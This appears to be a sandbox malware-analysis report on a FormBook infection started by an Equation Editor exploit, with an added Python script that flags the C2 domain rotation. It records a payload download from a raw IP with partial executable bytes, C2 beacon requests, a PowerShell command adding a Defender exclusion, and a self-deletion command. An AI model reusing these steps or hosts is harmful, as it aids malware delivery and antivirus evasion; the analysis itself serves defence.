Oct 30, 2024 08:40:12.888900042 CET | 192.168.2.22 | 8.8.8.8 | 0xc2c0 | Standard query (0) | www.mbbwa4wp.cfd | A (IP address) | IN (0x0001) | false
Oct 30, 2024 08:40:33.900860071 CET | 192.168.2.22 | 8.8.8.8 | 0xb8e | Standard query (0) | www.fcno30.com | A (IP address) | IN (0x0001) | false
Oct 30, 2024 08:40:53.956487894 CET | 192.168.2.22 | 8.8.8.8 | 0xe8fb | Standard query (0) | www.ko-or-a-news.com | A (IP address) | IN (0x0001) | false
Oct 30, 2024 08:41:16.195372105 CET | 192.168.2.22 | 8.8.8.8 | 0xbbcb | Standard query (0) | www.launchyouglobal.com | A (IP address) | IN (0x0001) | false
Oct 30, 2024 08:41:36.174273968 CET | 192.168.2.22 | 8.8.8.8 | 0xf219 | Standard query (0) | www.trygenesisx.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 30, 2024 08:38:11.560230017 CET | 8.8.8.8 | 192.168.2.22 | 0x622a | Name error (3) | www.education2jobs.com | none | none | A (IP address) | IN (0x0001) | false
Oct 30, 2024 08:38:31.842817068 CET | 8.8.8.8 | 192.168.2.22 | 0xa59f | Name error (3) | www.lifeofthobes.uk | none | none | A (IP address) | IN (0x0001) | false
Oct 30, 2024 08:38:51.202903986 CET | 8.8.8.8 | 192.168.2.22 | 0x575c | No error (0) | www.thecareskin.com | thecareskin.com | | CNAME (Canonical name) | IN (0x0001) | false
Oct 30, 2024 08:38:51.202903986 CET | 8.8.8.8 | 192.168.2.22 | 0x575c | No error (0) | thecareskin.com | | 13.248.213.45 | A (IP address) | IN (0x0001) | false
Oct 30, 2024 08:38:51.202903986 CET | 8.8.8.8 | 192.168.2.22 | 0x575c | No error (0) | thecareskin.com | | 76.223.67.189 | A (IP address) | IN (0x0001) | false
Oct 30, 2024 08:39:11.327434063 CET | 8.8.8.8 | 192.168.2.22 | 0xebec | Name error (3) | www.opmk.monster | none | none | A (IP address) | IN (0x0001) | false
Oct 30, 2024 08:39:52.721528053 CET | 8.8.8.8 | 192.168.2.22 | 0x15a2 | Name error (3) | www.affirmationtotebags.com | none | none | A (IP address) | IN (0x0001) | false
Oct 30, 2024 08:40:13.004703999 CET | 8.8.8.8 | 192.168.2.22 | 0xc2c0 | Name error (3) | www.mbbwa4wp.cfd | none | none | A (IP address) | IN (0x0001) | false
Oct 30, 2024 08:40:33.913568974 CET | 8.8.8.8 | 192.168.2.22 | 0xb8e | No error (0) | www.fcno30.com | fcno30.com | | CNAME (Canonical name) | IN (0x0001) | false
Oct 30, 2024 08:40:33.913568974 CET | 8.8.8.8 | 192.168.2.22 | 0xb8e | No error (0) | fcno30.com | | 68.66.226.117 | A (IP address) | IN (0x0001) | false
Oct 30, 2024 08:40:53.969841957 CET | 8.8.8.8 | 192.168.2.22 | 0xe8fb | Name error (3) | www.ko-or-a-news.com | none | none | A (IP address) | IN (0x0001) | false
Oct 30, 2024 08:41:16.237962008 CET | 8.8.8.8 | 192.168.2.22 | 0xbbcb | Server failure (2) | www.launchyouglobal.com | none | none | A (IP address) | IN (0x0001) | false
Oct 30, 2024 08:41:36.245017052 CET | 8.8.8.8 | 192.168.2.22 | 0xf219 | Server failure (2) | www.trygenesisx.com | none | none | A (IP address) | IN (0x0001) | false
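The ten lookups above are one pass through a list of candidate command-and-control names, sent about every 20 seconds regardless of the answer: six come back NXDOMAIN, two SERVFAIL, and only www.thecareskin.com and www.fcno30.com resolve, each followed within milliseconds by a port-80 connection to the returned address. The Python below is an added example and is not part of the Joe Sandbox report. It takes the DNS and TCP records transcribed from the tables as constructed input and scripts the checks an analyst would use to tell this pattern from ordinary browsing: names never repeat, most answers are negative, the queries are paced by a timer, and a resolved address is contacted immediately. The thresholds (min_domains, max_resolved_share, max_jitter, window) are illustrative assumptions.

```python
from collections import Counter
from datetime import datetime
from statistics import median

DAY = "2024-10-30 "

# Constructed from the DNS query/answer tables in the report (CET, truncated to microseconds).
# Fields: query time, answer time, transaction id, reply code, queried name, A records returned.
DNS_EVENTS = [
    ("08:38:11.549665", "08:38:11.560230", 0x622a, "NXDOMAIN", "www.education2jobs.com", []),
    ("08:38:31.831712", "08:38:31.842817", 0xa59f, "NXDOMAIN", "www.lifeofthobes.uk", []),
    ("08:38:51.190649", "08:38:51.202903", 0x575c, "NOERROR", "www.thecareskin.com", ["13.248.213.45", "76.223.67.189"]),
    ("08:39:11.313864", "08:39:11.327434", 0xebec, "NXDOMAIN", "www.opmk.monster", []),
    ("08:39:52.711354", "08:39:52.721528", 0x15a2, "NXDOMAIN", "www.affirmationtotebags.com", []),
    ("08:40:12.888900", "08:40:13.004703", 0xc2c0, "NXDOMAIN", "www.mbbwa4wp.cfd", []),
    ("08:40:33.900860", "08:40:33.913568", 0xb8e, "NOERROR", "www.fcno30.com", ["68.66.226.117"]),
    ("08:40:53.956487", "08:40:53.969841", 0xe8fb, "NXDOMAIN", "www.ko-or-a-news.com", []),
    ("08:41:16.195372", "08:41:16.237962", 0xbbcb, "SERVFAIL", "www.launchyouglobal.com", []),
    ("08:41:36.174273", "08:41:36.245017", 0xf219, "SERVFAIL", "www.trygenesisx.com", []),
]

# First packet of each port-80 TCP session that followed a successful answer, from the packet table.
TCP_CONNECTS = [
    ("08:38:51.204629", "13.248.213.45", 80),
    ("08:40:33.913908", "68.66.226.117", 80),
]


def parse_ts(hms):
    return datetime.strptime(DAY + hms, "%Y-%m-%d %H:%M:%S.%f")


def reply_code_counts(events):
    """How many lookups ended NOERROR / NXDOMAIN / SERVFAIL."""
    return Counter(e[3] for e in events)


def query_intervals(events):
    """Seconds between consecutive queries, in the order they were sent."""
    times = [parse_ts(e[0]) for e in events]
    return [(b - a).total_seconds() for a, b in zip(times, times[1:])]


def median_interval(events):
    return median(query_intervals(events))


def looks_like_domain_rotation(events, min_domains=5, max_resolved_share=0.5, max_jitter=0.5):
    """Heuristic for a bot walking a configured C2 list (thresholds are illustrative assumptions).

    Three properties separate the walk from browsing: every name is asked exactly once,
    most names do not resolve, and the lookups are paced by a sleep loop, not by answers.
    """
    names = [e[4] for e in events]
    if len(set(names)) < min_domains or len(set(names)) != len(names):
        return False, "too few names, or a name was repeated"
    resolved_share = reply_code_counts(events)["NOERROR"] / len(events)
    if resolved_share > max_resolved_share:
        return False, f"{resolved_share:.0%} of names resolved"
    gaps = query_intervals(events)
    period = median(gaps)
    # Count gaps within +/- max_jitter of the median; one outlier (a sleep that ran long) is tolerated.
    regular = sum(abs(g - period) <= max_jitter * period for g in gaps)
    if regular < 0.6 * len(gaps):
        return False, "lookups are not periodic"
    return True, f"{len(names)} distinct names, {resolved_share:.0%} resolved, ~{period:.0f}s period"


def correlate_connects(events, connects, window=2.0):
    """Pair each resolved name with the TCP connection made to one of its addresses."""
    hits = []
    for _, answered, _, rcode, name, addrs in events:
        if rcode != "NOERROR":
            continue
        t_answer = parse_ts(answered)
        for t_conn, ip, port in connects:
            delay = (parse_ts(t_conn) - t_answer).total_seconds()
            if ip in addrs and 0 <= delay <= window:
                hits.append((name, ip, port, delay))
    return hits


if __name__ == "__main__":
    print(reply_code_counts(DNS_EVENTS))
    print([round(g, 1) for g in query_intervals(DNS_EVENTS)])
    print(looks_like_domain_rotation(DNS_EVENTS))
    for name, ip, port, delay in correlate_connects(DNS_EVENTS, TCP_CONNECTS):
        print(f"{name} -> {ip}:{port} {delay * 1000:.1f} ms after the answer")
```

On the records above the verdict is positive (10 distinct names, 20% resolved, a median period of about 20 s with a single 41 s outlier around the thecareskin.com session), and both resolved names are paired with a connection under 2 ms after the answer arrived. The same four checks work on resolver logs or Zeek dns.log output once the fields are mapped; the one caveat is that a host behind a caching resolver will show fewer negative answers than the sandbox did, because the cache absorbs repeats.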
                                                                                                                                                                                  • 87.120.84.38
                                                                                                                                                                                  • www.thecareskin.com
                                                                                                                                                                                  • www.fcno30.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.22 | 49163 | 87.120.84.38 | 80 | 3568 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Timestamp | Bytes transferred | Direction | Data
Oct 30, 2024 08:37:28.755836010 CET | 322 | OUT | GET /txt/4q0pGnqqpgTTSL7.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 87.120.84.38
Connection: Keep-Alive
Oct 30, 2024 08:37:29.702449083 CET | 1236 | IN | HTTP/1.1 200 OK
Server: nginx/1.26.2
Date: Wed, 30 Oct 2024 07:37:29 GMT
Content-Type: application/x-msdos-program
Content-Length: 662016
Connection: keep-alive
Last-Modified: Wed, 30 Oct 2024 02:32:29 GMT
ETag: "a1a00-625a88369ea83"
Accept-Ranges: bytes
Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 64 9a 21 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 fe 09 00 00 1a 00 00 00 00 00 00 e2 1d 0a 00 00 20 00 00 00 20 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 0a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 90 1d 0a 00 4f 00 00 00 00 20 0a 00 20 17 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0a 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELd!g0 @ `@O @ H.text `.rsrc @@.reloc@@BHqgD0((+*0((+*0((+*0((+*0((+*0((+*0((+*0((+*0((+*0(( +*0
Oct 30, 2024 08:37:29.702516079 CET | 1236 | IN | Data Raw: 00 00 01 00 00 11 00 02 80 01 00 00 04 28 18 00 00 06 00 02 03 04 05 0e 04 0e 05 28 21 00 00 0a 0a 2b 00 06 2a 00 13 30 07 00 21 00 00 00 01 00 00 11 00 02 80 01 00 00 04 28 18 00 00 06 00 02 03 04 05 0e 04 0e 05 0e 06 28 22 00 00 0a 0a 2b 00 06
Data Ascii: ((!+*0!(("+*vs~#*0J~~#($,rps%z~,~~#(&(*0},~(+a
Oct 30, 2024 08:37:29.702528954 CET | 1236 | IN | Data Raw: 00 0a 6f 4b 00 00 0a 00 02 7b 06 00 00 04 28 01 00 00 2b 02 fe 06 2e 00 00 06 73 4d 00 00 0a 6f 4e 00 00 0a 00 02 7b 14 00 00 04 03 6f 39 00 00 0a 00 02 7b 11 00 00 04 17 6f 48 00 00 0a 00 2a 00 00 13 30 03 00 48 00 00 00 08 00 00 11 00 02 7b 15
Data Ascii: oK{(+.sMoN{o9{oH*0H{oOoP,-{oOoQoRoSoT}+*0P{oJoU{oJ(+~p%-&~osW%p(+(+oZ
Oct 30, 2024 08:37:29.702539921 CET | 1236 | IN | Data Raw: 00 00 0a 72 b5 01 00 70 6f 6d 00 00 0a 6f 6e 00 00 0a 28 62 00 00 0a 13 08 11 08 39 9c 00 00 00 00 11 06 6f 6c 00 00 0a 72 b5 01 00 70 6f 6d 00 00 0a 6f 6e 00 00 0a 13 09 11 06 6f 6c 00 00 0a 72 bf 01 00 70 6f 6d 00 00 0a 6f 6e 00 00 0a 13 0a 72
Data Ascii: rpomon(b9olrpomonolrpomonrpso`%rQp%%rWp%%r]p(eolrpomopoqor%/os:u4,ot+*
Oct 30, 2024 08:37:29.702550888 CET | 848 | IN | Data Raw: 00 02 7b 0d 00 00 04 1e 1e 1e 1e 73 83 00 00 0a 6f 84 00 00 0a 00 02 7b 0d 00 00 04 72 e9 02 00 70 6f 85 00 00 0a 00 02 7b 0d 00 00 04 1f 6d 1f 24 73 86 00 00 0a 6f 87 00 00 0a 00 02 7b 0d 00 00 04 1b 6f 88 00 00 0a 00 02 7b 0d 00 00 04 72 fd 02
Data Ascii: {so{rpo{m$so{o{rpo9{o{o{+so{ Os/o{so{rpo{ "so{o
Oct 30, 2024 08:37:29.702560902 CET | 1236 | IN | Data Raw: 39 00 00 0a 00 02 7b 14 00 00 04 17 6f 8c 00 00 0a 00 02 7b 14 00 00 04 20 75 02 00 00 20 81 00 00 00 73 2f 00 00 0a 6f 82 00 00 0a 00 02 7b 14 00 00 04 1e 16 1e 16 73 83 00 00 0a 6f 84 00 00 0a 00 02 7b 14 00 00 04 72 bd 03 00 70 6f 85 00 00 0a
Data Ascii: 9{o{ u s/o{so{rpo{ so{o{rpo9{o{o{o{o{M s/o{so{r
Oct 30, 2024 08:37:29.702583075 CET | 1236 | IN | Data Raw: 6f 39 00 00 0a 00 02 7b 1d 00 00 04 17 6f 8c 00 00 0a 00 02 7b 1d 00 00 04 28 a0 00 00 0a 6f a1 00 00 0a 00 02 7b 1d 00 00 04 20 75 02 00 00 20 4f 03 00 00 73 2f 00 00 0a 6f 82 00 00 0a 00 02 7b 1d 00 00 04 1e 16 1e 16 73 83 00 00 0a 6f 84 00 00
Data Ascii: o9{o{(o{ u Os/o{so{r}po{ _ so{o{rpo9"A"As(( s(({o({o
Oct 30, 2024 08:37:29.702594995 CET | 1236 | IN | Data Raw: d0 06 00 00 01 28 27 00 00 0a 16 6f bc 00 00 0a 0a 06 8e 16 fe 01 0b 07 2c 09 00 72 61 00 00 70 0c 2b 10 06 16 9a 74 06 00 00 01 6f c2 00 00 0a 0c 2b 00 08 2a 00 13 30 03 00 3b 00 00 00 14 00 00 11 00 28 bb 00 00 0a d0 09 00 00 01 28 27 00 00 0a
Data Ascii: ('o,rap+to+*0;(('o,rap+to+*0;(('o,rap+to+*0;(('o,
Oct 30, 2024 08:37:29.702605009 CET | 636 | IN | Data Raw: 00 04 72 99 05 00 70 6f 39 00 00 0a 00 02 7b 21 00 00 04 1f 10 6f d9 00 00 0a 00 02 7b 22 00 00 04 1b 6f cf 00 00 0a 00 02 7b 22 00 00 04 20 23 01 00 00 20 e7 00 00 00 73 2f 00 00 0a 6f 82 00 00 0a 00 02 7b 22 00 00 04 1f 10 16 1e 16 73 83 00 00
Data Ascii: rpo9{!o{"o{" # s/o{"so{")so{"rpo{" )so{"o{"rpo9{"o{#o{# # ;s/o{#
Oct 30, 2024 08:37:29.702617884 CET | 1236 | IN | Data Raw: 00 00 01 28 aa 00 00 0a 00 02 1e 1d 1e 1d 73 83 00 00 0a 28 ab 00 00 0a 00 02 16 28 df 00 00 0a 00 02 16 28 e0 00 00 0a 00 02 72 41 06 00 70 28 85 00 00 0a 00 02 1f 18 1f 15 1f 18 1f 15 73 83 00 00 0a 28 e1 00 00 0a 00 02 16 28 e2 00 00 0a 00 02
Data Ascii: (s(((rAp(s((((rApo9{o{o{ o(*(rMpoo}%(4*0Gs{%ssos
Oct 30, 2024 08:37:29.708095074 CET | 1236 | IN | Data Raw: 0e 07 7d 3a 00 00 04 02 0e 08 7d 3b 00 00 04 2a 26 00 02 03 7d 34 00 00 04 2a 26 00 02 03 7d 35 00 00 04 2a 26 00 02 03 7d 36 00 00 04 2a 26 00 02 03 7d 37 00 00 04 2a 26 00 02 03 7d 38 00 00 04 2a 26 00 02 03 7d 39 00 00 04 2a 26 00 02 03 7d 3a
Data Ascii: }:};*&}4*&}5*&}6*&}7*&}8*&}9*&}:*&};*0{4+*0{5+*0{6+*0{7+*0{8+*0{9+*


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.22  49164        13.248.213.45   80                1244  C:\Windows\explorer.exe

Timestamp: Oct 30, 2024 08:38:51.210309982 CET  Bytes transferred: 168  Direction: OUT
Data:
GET /btrd/?dnpxPL=MPO8Ot&NPY8=AbeIgGnzBU83HSXrQkpvN+QaXMHa/Smw3FQvIGYyvMJrWwYzMis5HD6DdthggtUmTF7mFQ== HTTP/1.1
Host: www.thecareskin.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:

Timestamp: Oct 30, 2024 08:38:51.849329948 CET  Bytes transferred: 346  Direction: IN
Data:
HTTP/1.1 200 OK
Server: openresty
Date: Wed, 30 Oct 2024 07:38:51 GMT
Content-Type: text/html
Content-Length: 206
Connection: close
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?dnpxPL=MPO8Ot&NPY8=AbeIgGnzBU83HSXrQkpvN+QaXMHa/Smw3FQvIGYyvMJrWwYzMis5HD6DdthggtUmTF7mFQ=="}</script></head></html>


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
2           192.168.2.22  49165        68.66.226.117   80                1244  C:\Windows\explorer.exe

Timestamp: Oct 30, 2024 08:40:33.925651073 CET  Bytes transferred: 163  Direction: OUT
Data:
GET /btrd/?NPY8=Aqp/nEdW5fSRgBppOcSBDZbXY4IaYVD9lzqE2utQjmbccywWz39dK6w1iF5Po1lTCoAGbA==&dnpxPL=MPO8Ot HTTP/1.1
Host: www.fcno30.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:

Timestamp: Oct 30, 2024 08:40:34.559539080 CET  Bytes transferred: 1159  Direction: IN
Data:
HTTP/1.1 404 Not Found
Connection: close
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 796
date: Wed, 30 Oct 2024 07:40:34 GMT
server: LiteSpeed
strict-transport-security: max-age=63072000; includeSubDomains
x-frame-options: SAMEORIGIN
x-content-type-options: nosniff
Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


Code Manipulations

Function Name  Hook Type  Active in Processes
PeekMessageA   INLINE     explorer.exe
PeekMessageW   INLINE     explorer.exe
GetMessageW    INLINE     explorer.exe
GetMessageA    INLINE     explorer.exe

Function Name  Hook Type  New Data
PeekMessageA   INLINE     0x48 0x8B 0xB8 0x8C 0xCE 0xE6
PeekMessageW   INLINE     0x48 0x8B 0xB8 0x84 0x4E 0xE6
GetMessageW    INLINE     0x48 0x8B 0xB8 0x84 0x4E 0xE6
GetMessageA    INLINE     0x48 0x8B 0xB8 0x8C 0xCE 0xE6


Target ID: 0
Start time: 03:37:24
Start date: 30/10/2024
Path: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit): false
Commandline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Imagebase: 0x13fcd0000
File size: 1'423'704 bytes
MD5 hash: 9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 2
Start time: 03:37:25
Start date: 30/10/2024
Path: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit): true
Commandline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase: 0x400000
File size: 543'304 bytes
MD5 hash: A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 5
Start time: 03:37:29
Start date: 30/10/2024
Path: C:\Users\user\AppData\Roaming\ihbgfbin.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Roaming\ihbgfbin.exe"
Imagebase: 0xc90000
File size: 662'016 bytes
MD5 hash: 6A39668F48A502DBFA3CC13C7F463281
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.422078924.0000000003D27000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.422078924.0000000003D27000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 00000005.00000002.422078924.0000000003D27000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.422078924.0000000003D27000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.422078924.0000000003D27000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.422078924.0000000003D27000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
Reputation: low
Has exited: true

Target ID: 6
Start time: 03:37:34
Start date: 30/10/2024
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ihbgfbin.exe"
Imagebase: 0xf60000
File size: 427'008 bytes
MD5 hash: EB32C070E658937AA9FA9F3AE629B2B8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 7
Start time: 03:37:34
Start date: 30/10/2024
Path: C:\Users\user\AppData\Roaming\ihbgfbin.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Roaming\ihbgfbin.exe"
Imagebase: 0xc90000
File size: 662'016 bytes
MD5 hash: 6A39668F48A502DBFA3CC13C7F463281
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 00000007.00000002.429564414.000000000041F000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.429526201.0000000000140000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.429526201.0000000000140000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 00000007.00000002.429526201.0000000000140000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.429526201.0000000000140000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.429526201.0000000000140000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.429526201.0000000000140000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                  Has exited:true

Target ID:9
Start time:03:37:34
Start date:30/10/2024
Path:C:\Windows\explorer.exe
Wow64 process (32bit):false
Commandline:C:\Windows\Explorer.EXE
Imagebase:0xff2f0000
File size:3'229'696 bytes
MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:false

Target ID:10
Start time:03:37:36
Start date:30/10/2024
Path:C:\Windows\SysWOW64\mstsc.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\SysWOW64\mstsc.exe"
Imagebase:0x900000
File size:1'068'544 bytes
MD5 hash:4676AAA9DDF52A50C829FEDB4EA81E54
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.928364995.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.928452620.0000000000410000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.928452620.0000000000410000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 0000000A.00000002.928452620.0000000000410000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.928452620.0000000000410000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.928452620.0000000000410000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.928452620.0000000000410000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.928419013.0000000000390000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.928419013.0000000000390000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Diceloader_15eeb7b9, Description: unknown, Source: 0000000A.00000002.928419013.0000000000390000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.928419013.0000000000390000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.928419013.0000000000390000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.928419013.0000000000390000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:moderate
Has exited:false

Target ID:11
Start time:03:37:39
Start date:30/10/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:/c del "C:\Users\user\AppData\Roaming\ihbgfbin.exe"
Imagebase:0x4a170000
File size:302'592 bytes
MD5 hash:AD7B9C14083B52BC532FBA5948342B98
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:13
Start time:03:37:49
Start date:30/10/2024
Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):true
Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:0x400000
File size:543'304 bytes
MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:false


Execution Graph

Execution Coverage:15.7%
Dynamic/Decrypted Code Coverage:100%
Signature Coverage:1.7%
Total number of Nodes:172
Total number of Limit Nodes:13
